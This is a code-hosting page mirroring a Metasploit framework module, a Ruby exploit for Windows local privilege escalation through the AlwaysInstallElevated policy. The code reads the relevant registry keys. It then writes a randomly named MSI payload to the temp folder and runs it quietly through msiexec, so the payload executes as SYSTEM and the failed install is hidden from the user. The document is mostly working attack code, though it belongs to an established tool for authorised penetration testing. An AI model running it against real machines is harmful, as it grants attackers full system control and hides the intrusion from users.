CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/local/always_install_elevated.rb
Views: 11655
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::EXE

10
  include Msf::Exploit::FileDropper

11
  include Msf::Post::File

12
  include Msf::Post::Windows::Registry

13


14


15
  def initialize(info={})

16
    super(update_info(info, {

17
      'Name'          => 'Windows AlwaysInstallElevated MSI',

18
      'Description'    => %q{

19
          This module checks the AlwaysInstallElevated registry keys which dictates if

20
        .MSI files should be installed with elevated privileges (NT AUTHORITY\SYSTEM).

21
        The generated .MSI file has an embedded executable which is extracted and run

22
        by the installer. After execution the .MSI file intentionally fails installation

23
        (by calling some invalid VBS) to prevent it being registered on the system.

24
        By running this with the /quiet argument the error will not be seen by the user.

25
      },

26
      'License'       => MSF_LICENSE,

27
      'Author'        =>

28
        [

29
          'Ben Campbell',

30
          'Parvez Anwar' # discovery?/inspiration

31
        ],

32
      'Arch'          => [ ARCH_X86, ARCH_X64 ],

33
      'Platform'      => [ 'win' ],

34
      'SessionTypes'  => [ 'meterpreter' ],

35
      'DefaultOptions' =>

36
        {

37
          'WfsDelay' => 10,

38
          'EXITFUNC' => 'process',

39
          'MSI::UAC' => true

40
        },

41
      'Targets'       =>

42
        [

43
          [ 'Windows', { } ],

44
        ],

45
      'References'    =>

46
        [

47
          [ 'URL', 'http://www.greyhathacker.net/?p=185' ],

48
          [ 'URL', 'http://msdn.microsoft.com/en-us/library/aa367561(VS.85).aspx' ],

49
          [ 'URL', 'http://rewtdance.blogspot.co.uk/2013/03/metasploit-msi-payload-generation.html']

50
        ],

51
      'DisclosureDate'=> '2010-03-18',

52
      'DefaultTarget' => 0

53
    }))

54


55
    register_advanced_options([

56
      OptString.new('LOG_FILE', [false, 'Remote path to output MSI log file to.', nil]),

57
      OptBool.new('QUIET', [true, 'Run the MSI with the /quiet flag.', true])

58
    ])

59
  end

60


61
  def check

62
    install_elevated = "AlwaysInstallElevated"

63
    installer = "SOFTWARE\\Policies\\Microsoft\\Windows\\Installer"

64
    hkcu = "HKEY_CURRENT_USER\\#{installer}"

65
    hklm = "HKEY_LOCAL_MACHINE\\#{installer}"

66


67
    local_machine_value = registry_getvaldata(hklm,install_elevated)

68


69
    if local_machine_value.nil?

70
      vprint_error("#{hklm}\\#{install_elevated} does not exist or is not accessible.")

71
      return Msf::Exploit::CheckCode::Safe

72
    elsif local_machine_value == 0

73
      vprint_error("#{hklm}\\#{install_elevated} is #{local_machine_value}.")

74
      return Msf::Exploit::CheckCode::Safe

75
    else

76
      vprint_good("#{hklm}\\#{install_elevated} is #{local_machine_value}.")

77
      current_user_value = registry_getvaldata(hkcu,install_elevated)

78
    end

79


80
    if current_user_value.nil?

81
      vprint_error("#{hkcu}\\#{install_elevated} does not exist or is not accessible.")

82
      return Msf::Exploit::CheckCode::Safe

83
    elsif current_user_value == 0

84
      vprint_error("#{hkcu}\\#{install_elevated} is #{current_user_value}.")

85
      return Msf::Exploit::CheckCode::Safe

86
    else

87
      vprint_good("#{hkcu}\\#{install_elevated} is #{current_user_value}.")

88
      return Msf::Exploit::CheckCode::Vulnerable

89
    end

90
  end

91


92
  def exploit

93


94
    return unless check == Msf::Exploit::CheckCode::Vulnerable

95


96
    msi_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".msi"

97
    msi_source = generate_payload_msi

98


99
    # Upload MSI

100
    msi_destination = expand_path("%TEMP%\\#{msi_filename}").strip

101
    print_status("Uploading the MSI to #{msi_destination} ...")

102


103
    write_file(msi_destination, msi_source)

104
    register_file_for_cleanup(msi_destination)

105


106
    if datastore['LOG_FILE'].nil?

107
      logging = ""

108
    else

109
      logging = "/l* #{datastore['LOG_FILE']} "

110
    end

111


112
    if datastore['QUIET']

113
      quiet = "/quiet "

114
    else

115
      quiet = ""

116
    end

117


118
    cmd = "msiexec.exe #{logging}#{quiet}/package #{msi_destination}"

119


120
    print_status("Executing MSI...")

121
    vprint_status("Executing: #{cmd}")

122
    begin

123
      result = cmd_exec(cmd)

124
    rescue Rex::TimeoutError

125
      vprint_status("Execution timed out.")

126
    end

127
    vprint_status("MSI command-line feedback: #{result}")

128
  end

129
end

130


131